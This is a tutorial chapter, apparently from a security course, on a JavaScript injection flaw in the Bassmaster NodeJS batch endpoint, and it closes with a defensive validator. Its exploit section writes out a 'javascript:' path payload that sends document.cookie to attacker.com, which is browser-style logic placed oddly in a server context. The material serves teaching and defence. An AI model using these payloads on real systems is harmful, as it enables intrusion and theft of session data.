Chapter 6 - Bassmaster NodeJS Arbitrary JavaScript Injection Vulnerability

Overview

Chapter 6 focuses on an arbitrary JavaScript injection vulnerability found in the Bassmaster plugin of a NodeJS application. This vulnerability allows an attacker to inject and execute arbitrary JavaScript code through the plugin's API.

Getting Started

  • Environment Setup: Set up a NodeJS environment with the Bassmaster plugin installed. Ensure that the installed plugin version is one that is vulnerable to the arbitrary JavaScript injection.
  • Testing Tools: Use tools such as Postman or cURL to send HTTP requests to the Bassmaster API and observe the responses.

Vulnerability Discovery

  1. Identifying the Vulnerable Endpoint:
    • The vulnerable endpoint is part of the Bassmaster batch processing feature, which allows multiple requests to be processed in a single batch.
    • Inspect the API documentation to understand how batch requests are structured and processed.

POST /batch HTTP/1.1
Host: vulnerable-nodejs-app.com
Content-Type: application/json

{
    "requests": [
        {
            "method": "get",
            "path": "/path1"
        },
        {
            "method": "get",
            "path": "/path2"
        }
    ]
}
  2. Testing for JavaScript Execution:
    • Inject JavaScript code into the batched requests to test for improper input handling and execution of the injected script.
    • Use console.log or similar statements to confirm execution and identify the execution context.

{
    "requests": [
        {
            "method": "get",
            "path": "/path1"
        },
        {
            "method": "get",
            "path": "javascript:console.log('Injected JS executed');"
        }
    ]
}

Exploiting the Vulnerability

  1. Crafting the Injection Payload:
    • Create a payload that leverages the JavaScript execution environment to perform malicious actions, such as sending data to an attacker-controlled server.

{
    "requests": [
        {
            "method": "get",
            "path": "javascript:fetch('http://attacker.com', { method: 'POST', body: document.cookie });"
        }
    ]
}
  2. Executing the Payload:
    • Send the crafted payload to the vulnerable Bassmaster endpoint using a tool like Postman and observe the behavior.
    • Monitor network traffic to verify whether data exfiltration or other unintended actions occur.

Summary

This chapter explains how to identify and exploit arbitrary JavaScript injection vulnerabilities in NodeJS applications using the Bassmaster plugin. It emphasizes the need for thorough input validation and sanitization in applications that process JavaScript code dynamically.
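As an added example of the input validation the summary calls for (this is illustrative code, not part of Bassmaster or of the original chapter), the following validator checks the batch payload shape shown above before any entry is dispatched. The method allow-list, the path pattern and the batch-size limit are assumptions chosen for the example.

```javascript
// Added example, not Bassmaster's own code: validate a /batch body before
// any entry is processed. Each entry must use an allowed HTTP method and a
// server-relative path, so scheme-prefixed strings such as the
// "javascript:..." paths seen in the chapter are rejected up front.

const ALLOWED_METHODS = new Set(['get', 'post', 'put', 'patch', 'delete']);

// Server-relative path: a leading slash followed by unreserved URL characters,
// with an optional simple query string. ':' is deliberately excluded so no
// URL scheme can appear; quotes, parentheses, braces and ';' are excluded too.
const PATH_PATTERN = /^\/[A-Za-z0-9_\-.~\/]*(\?[A-Za-z0-9_\-.~=&%]*)?$/;

const MAX_BATCH_SIZE = 20; // assumed limit for the example; tune per application

function validateBatch(body) {
  const errors = [];
  if (body === null || typeof body !== 'object' || !Array.isArray(body.requests)) {
    return { ok: false, errors: ['body.requests must be an array'] };
  }
  if (body.requests.length === 0 || body.requests.length > MAX_BATCH_SIZE) {
    errors.push(`requests must contain 1..${MAX_BATCH_SIZE} entries`);
  }
  body.requests.forEach((req, i) => {
    if (req === null || typeof req !== 'object') {
      errors.push(`requests[${i}] must be an object`);
      return;
    }
    if (typeof req.method !== 'string' || !ALLOWED_METHODS.has(req.method.toLowerCase())) {
      errors.push(`requests[${i}].method is not an allowed HTTP method`);
    }
    if (typeof req.path !== 'string' || !PATH_PATTERN.test(req.path)) {
      errors.push(`requests[${i}].path is not a server-relative path`);
    }
  });
  return { ok: errors.length === 0, errors };
}

// Constructed sample batches mirroring the chapter's requests.
const benignBatch = {
  requests: [{ method: 'get', path: '/path1' }, { method: 'get', path: '/path2' }],
};
const injectedBatch = {
  requests: [
    { method: 'get', path: '/path1' },
    { method: 'get', path: "javascript:console.log('Injected JS executed');" },
  ],
};
```

Run the validator as the first step of the batch handler and reject the whole batch with 400 when `ok` is false, logging the `errors` array so that probing attempts show up in application logs.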